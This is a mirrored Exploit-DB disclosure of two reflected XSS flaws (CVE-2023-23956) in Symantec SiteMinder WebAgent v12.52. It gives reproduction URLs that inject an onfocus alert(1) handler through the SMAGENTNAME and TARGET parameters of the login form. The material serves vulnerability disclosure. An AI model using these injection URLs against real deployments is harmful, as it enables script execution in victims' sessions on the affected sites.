bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51530.txt
Exploit-DB 147824bdba DB: 2023-06-20 
8 changes to exploits/shellcodes/ghdb

Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

Groomify v1.0 - SQL Injection

Jobpilot v2.61 - SQL Injection

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)

The Shop v2.5 - SQL Injection

WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass
2023-06-20 00:16:29 +00:00

45 lines
No EOL
1.7 KiB
Text
Raw Permalink Blame History

Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version: 12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.
Vulnerability Details:
---------------------
*Impact:*
This vulnerability allows an attacker to execute arbitrary JavaScript code
in the context of the affected application.
*Steps to Reproduce:*
*First:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
*Second:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
Reference in a new issue View git blame Copy permalink